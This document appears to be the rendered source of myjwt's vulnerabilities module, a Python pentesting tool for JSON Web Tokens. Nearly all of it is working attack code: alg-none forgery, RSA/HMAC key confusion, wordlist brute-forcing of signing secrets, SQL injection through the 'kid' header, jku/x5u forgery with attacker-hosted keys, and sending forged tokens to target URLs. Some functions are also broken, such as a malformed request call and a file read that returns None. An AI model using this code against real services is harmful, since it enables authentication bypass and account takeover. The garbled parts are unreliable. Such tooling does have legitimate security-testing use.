Source code for myjwt.vulnerabilities

All methods needed to try vulnerabilities on jwt
import base64
import json
from typing import Dict

import click
import requests
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from OpenSSL import crypto

from myjwt.Exception import InvalidJWT
from myjwt.modify_jwt import change_alg
from myjwt.modify_jwt import signature
from myjwt.utils import create_crt
from myjwt.utils import encode_jwt
from myjwt.utils import HEADER
from myjwt.utils import is_valid_jwt
from myjwt.utils import jwt_to_json
from myjwt.utils import PAYLOAD
from myjwt.utils import SIGNATURE

[docs]def none_vulnerability(jwt: str) -> str: """ Check none Vulnerability. Parameters ---------- jwt: str your jwt string. Returns ------- str your new jwt. Raises ------- InvalidJWT if your jwt is not valid. """ if not is_valid_jwt(jwt): raise InvalidJWT("Invalid JWT format") jwt_json = change_alg(jwt_to_json(jwt), "none") return encode_jwt(jwt_json) + "."
[docs]def confusion_rsa_hmac(jwt: str, filename: str) -> str: """ Check rsa/hmac confusion. Parameters ---------- jwt: str your jwt string. filename: str path file of your public key. Returns ------- str your new jwt. Raises ------- InvalidJWT if your jwt is not valid. """ if not is_valid_jwt(jwt): raise InvalidJWT("Invalid JWT format") jwt_json = change_alg(jwt_to_json(jwt), "HS256") return signature(jwt_json, open(filename).read())
[docs]def bruteforce_wordlist(jwt: str, filename: str) -> str: """ Crack your jwt with wordlist. Parameters ---------- jwt: str your jwt string. filename: str path file of your wordlist txt file. Returns ------- str your new jwt or "" if the valid key is not found. Raises ------- InvalidJWT if your jwt is not valid. """ if not is_valid_jwt(jwt): raise InvalidJWT("Invalid JWT format") jwt_json = jwt_to_json(jwt) with open(filename, encoding="latin-1") as file: all_password = [line.rstrip() for line in file] file.close() for password in all_password: new_jwt = signature(jwt_json, password) new_signature = new_jwt.split(".")[2] if new_signature == jwt.split(".")[2]: return password return ""
[docs]def inject_sql_kid(jwt: str, injection: str) -> str: """ Inject sql to your jwt. Parameters ---------- jwt: str your jwt. injection: str your kid injection. Returns ------- str your new jwt. Raises ------- InvalidJWT if your jwt is not valid. """ if not is_valid_jwt(jwt): raise InvalidJWT("Invalid JWT format") jwt_json = jwt_to_json(jwt) jwt_json[HEADER]["kid"] = injection return signature(jwt_json, "")
[docs]def send_jwt_to_url( url: str, method: str, data: Dict, cookies: Dict, jwt: str, ) -> requests.Response: """ Parameters ---------- url: str your url. method: str method (GET, POST, etc.....). data: Dict json to send. cookies: Dict cookies to send. jwt: str your jwt. Returns ------- requests.Response Response """ if method == "POST": return url, json=data, headers={"Authorization": "Bearer " + jwt}, cookies=cookies, ) return requests.request(method=method, url=url, json=data, cookies=cookies)
[docs]def jku_vulnerability(jwt=None, url=None, file=None, pem=None): """ Check jku Vulnerability. Parameters ---------- jwt: str your jwt. url: str your url. file: str your output json file name pem: str pem file name Returns ------- str your new jwt. """ if not is_valid_jwt(jwt): raise InvalidJWT("Invalid JWT format") jwt_json = jwt_to_json(jwt) if "jku" not in jwt_json[HEADER]: raise InvalidJWT("Invalid JWT format JKU missing") if file is None: file = "jwk-python.json" jwks = requests.get(jwt_json[HEADER]["jku"]).json() jwt_json[HEADER]["alg"] = "RS256" if ".json" not in file: file += ".json" if not url.endswith("/"): url += "/" jwt_json[HEADER]["jku"] = f"{url}{file}" if pem is None: key = crypto.PKey() key.generate_key(type=crypto.TYPE_RSA, bits=2048) else: key = crypto.load_privatekey(crypto.FILETYPE_PEM, open(pem).read()) priv = key.to_cryptography_key() pub = priv.public_key() e = pub.public_numbers().e n = pub.public_numbers().n jwks["keys"][0]["e"] = ( base64.urlsafe_b64encode( e.to_bytes(e.bit_length() // 8 + 1, byteorder="big"), ) .decode("UTF-8") .rstrip("=") ) jwks["keys"][0]["n"] = ( base64.urlsafe_b64encode( n.to_bytes(n.bit_length() // 8 + 1, byteorder="big"), ) .decode("UTF-8") .rstrip("=") ) f = open(file, "w") f.write(json.dumps(jwks)) f.close() s = encode_jwt(jwt_json) sign = priv.sign( bytes(s, encoding="UTF-8"), algorithm=hashes.SHA256(), padding=padding.PKCS1v15(), ) return s + "." + base64.urlsafe_b64encode(sign).decode("UTF-8").rstrip("=")
[docs]def x5u_vulnerability(jwt=None, url=None, crt=None, pem=None, file=None): """ Check jku Vulnerability. Parameters ---------- jwt: str your jwt. url: str your url. crt: str crt path file pem: str pem file name file: str jwks file name Returns ------- str your new jwt. """ if not is_valid_jwt(jwt): raise InvalidJWT("Invalid JWT format") if file is None: file = "jwks_with_x5c.json" jwt_json = jwt_to_json(jwt) if "x5u" not in jwt_json[HEADER]: raise InvalidJWT("Invalid JWT format JKU missing") if crt is None or pem is None: crt, pem = create_crt() with open(crt) as f: content = f.close() x5u = requests.get(jwt_json[HEADER]["x5u"]).json() x5u["keys"][0]["x5c"] = ( content.replace("-----END CERTIFICATE-----", "") .replace("-----BEGIN CERTIFICATE-----", "") .replace("\n", "") ) if ".json" not in file: file += ".json" if not url.endswith("/"): url += "/" jwt_json[HEADER]["x5u"] = f"{url}{file}" f = open(file, "w") f.write(json.dumps(x5u)) f.close() s = encode_jwt(jwt_json) key = crypto.load_privatekey(crypto.FILETYPE_PEM, open(pem).read()) priv = key.to_cryptography_key() sign = priv.sign( bytes(s, encoding="UTF-8"), algorithm=hashes.SHA256(), padding=padding.PKCS1v15(), ) return s + "." + base64.urlsafe_b64encode(sign).decode("UTF-8").rstrip("=")